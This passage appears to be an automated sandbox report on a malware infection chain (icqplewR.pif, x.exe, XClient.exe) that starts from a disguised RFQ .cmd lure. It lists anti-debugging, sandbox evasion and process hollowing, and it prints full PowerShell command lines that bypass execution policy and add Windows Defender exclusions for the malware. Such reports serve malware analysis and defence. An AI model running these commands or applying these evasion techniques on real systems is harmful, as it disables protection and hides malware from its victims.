Source: C:\Users\user\Links\icqplewR.pif	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Links\icqplewR.pif	Memory allocated: 21D20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Memory allocated: 22370000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Memory allocated: 22190000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Memory allocated: 26A90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Memory allocated: 27A90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Memory allocated: 27C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Memory allocated: 28C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Memory allocated: 27C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Memory allocated: 28F40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Memory allocated: 27C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Memory allocated: 28F40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Memory allocated: 1CC20000 memory reserve \| memory write watch
Source: C:\Users\user\Links\icqplewR.pif	Memory allocated: 1D040000 memory reserve \| memory write watch
Source: C:\Users\user\Links\icqplewR.pif	Memory allocated: 1CDF0000 memory reserve \| memory write watch

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\user\Links\icqplewR.pif

9_1_004019F0

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Links\icqplewR.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Links\icqplewR.pif	Window / User API: threadDelayed 9605	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5847	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3902	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7625
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2010
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5662
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4039
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6454
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3269

Found evasive API chain (date check)

Source: C:\Users\user\AppData\Roaming\XClient.exe

Evasive API call chain: GetLocalTime,DecisionNodes

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Links\icqplewR.pif TID: 1548	Thread sleep time: -41505174165846465s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7692	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif TID: 1400	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7760	Thread sleep count: 7625 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4804	Thread sleep count: 2010 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6060	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7712	Thread sleep count: 5662 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8156	Thread sleep count: 4039 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7744	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8136	Thread sleep count: 6454 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8164	Thread sleep count: 3269 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5176	Thread sleep time: -6456360425798339s >= -30000s

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\Links\icqplewR.pif

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Links\icqplewR.pif	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F552F8 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	3_2_03F552F8
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 28_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime,	28_2_0040128D
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 28_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose,	28_2_00401612
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 29_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime,	29_2_0040128D
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 29_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose,	29_2_00401612

Source: C:\Users\user\Links\icqplewR.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Windows\SysWOW64\avicap32.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Windows\SysWOW64\MSVFW32.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Windows\SysWOW64\en-US\MSVFW32.dll.mui	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Windows\SysWOW64\en-US\avicap32.dll.mui	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Windows\SysWOW64\wbem\en-US\wmiutils.dll.mui	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll	Jump to behavior

Source: icqplewR.pif, 00000009.00000003.1896768334.0000000028F41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ronIgnuQEMuCAEKH8ln
Source: x.exe, 00000003.00000002.1224081576.0000000001F46000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllssW4
Source: Rwelpqci.PIF, 00000013.00000002.1349651483.0000000001E68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\x.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Links\Rwelpqci.PIF	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\XClient.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\XClient.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\XClient.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\XClient.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Links\icqplewR.pif

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 3_2_03F6A5B0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

3_2_03F6A5B0

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Local\Temp\x.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Process queried: DebugPort			Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Links\icqplewR.pif

Code function: 9_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

9_1_0040CE09

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\user\Links\icqplewR.pif

9_1_004019F0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 3_2_03F63E20 LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary,

3_2_03F63E20

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Links\icqplewR.pif

Code function: 9_1_0040ADB0 GetProcessHeap,HeapFree,

9_1_0040ADB0

Enables debug privileges

Source: C:\Users\user\Links\icqplewR.pif	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Links\icqplewR.pif	Code function: 9_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_1_0040CE09
Source: C:\Users\user\Links\icqplewR.pif	Code function: 9_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_1_0040E61C
Source: C:\Users\user\Links\icqplewR.pif	Code function: 9_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_1_00416F6A
Source: C:\Users\user\Links\icqplewR.pif	Code function: 9_1_004123F1 SetUnhandledExceptionFilter,	9_1_004123F1
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_0040CE09
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_0040E61C
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_00416F6A
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_2_004123F1 SetUnhandledExceptionFilter,	20_2_004123F1
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_1_0040CE09
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_1_0040E61C
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_1_00416F6A
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_1_004123F1 SetUnhandledExceptionFilter,	20_1_004123F1

Source: C:\Users\user\Links\icqplewR.pif

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Links\icqplewR.pif	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Links\icqplewR.pif'
Source: C:\Users\user\Links\icqplewR.pif	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\Links\icqplewR.pif	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Links\icqplewR.pif'	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: C:\Users\user\Links\icqplewR.pif base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Memory allocated: C:\Users\user\Links\icqplewR.pif base: 400000 protect: page execute and read and write			Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\Links\icqplewR.pif

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Links\icqplewR.pif'

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\x.exe	Section unmapped: C:\Users\user\Links\icqplewR.pif base address: 400000			Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section unmapped: C:\Users\user\Links\icqplewR.pif base address: 400000			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Users\user\Links\icqplewR.pif base: 20A008			Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Memory written: C:\Users\user\Links\icqplewR.pif base: 2C4008			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\RFQ_HB648836_Enquiry.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\user\Links\icqplewR.pif C:\\Users\\user\\Links\icqplewR.pif	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Links\icqplewR.pif'	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'icqplewR.pif'	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Process created: C:\Users\user\Links\icqplewR.pif C:\\Users\\user\\Links\icqplewR.pif	Jump to behavior

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	3_2_03F554BC
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetLocaleInfoA,	3_2_03F5A104
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetLocaleInfoA,	3_2_03F5A0B8
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	3_2_03F555C8
Source: C:\Users\user\Links\icqplewR.pif	Code function: GetLocaleInfoA,	9_1_00417A20
Source: C:\Users\user\Links\Rwelpqci.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	19_2_040754BC
Source: C:\Users\user\Links\Rwelpqci.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	19_2_040755C7
Source: C:\Users\user\Links\Rwelpqci.PIF	Code function: GetLocaleInfoA,	19_2_0407A104
Source: C:\Users\user\Links\icqplewR.pif	Code function: GetLocaleInfoA,	20_2_00417A20
Source: C:\Users\user\Links\icqplewR.pif	Code function: GetLocaleInfoA,	20_1_00417A20

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Links\icqplewR.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
